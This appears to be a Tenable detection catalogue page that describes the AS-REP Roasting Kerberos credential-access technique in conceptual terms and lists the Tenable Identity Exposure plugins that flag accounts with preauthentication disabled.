Detections
Analytics
Steal or Forge Kerberos Tickets: AS-REP Roasting
Description
Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by Password Cracking Kerberos messages.Preauthentication offers protection against offline Password Cracking. When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password.
Products, Sensors, and Dependencies
| Product | Dependencies | Data source | Access required | Protocol | Data Collected | Notes |
|---|---|---|---|---|---|---|
| Tenable Identity Exposure | Active Directory | Authenticated AD user | LDAP/S(389/636) | Domain User + UAC | Plugin ID: 22-C-KERBEROS-CONFIG-ACCOUNT:R-KERB-WEAK-CONFIG-DONT-REQUIRE-PREAUTH-ACCOUNT | |
| Tenable Identity Exposure | Password Sync | Active Directory | Privileged AD user | RPC (135 + high ports) | User Password | Plugin ID: C-PASSWORD-HASHES-ANALYSIS |
References
Attack Path Technique Details
Framework: MITRE ATT&CK
Family: Credential Access
Technique: Steal or Forge Kerberos Tickets
Sub-Technique: AS-REP Roasting
Platform: Windows
Products Required: Tenable Identity Exposure
Tenable Release Date: 2022 Q3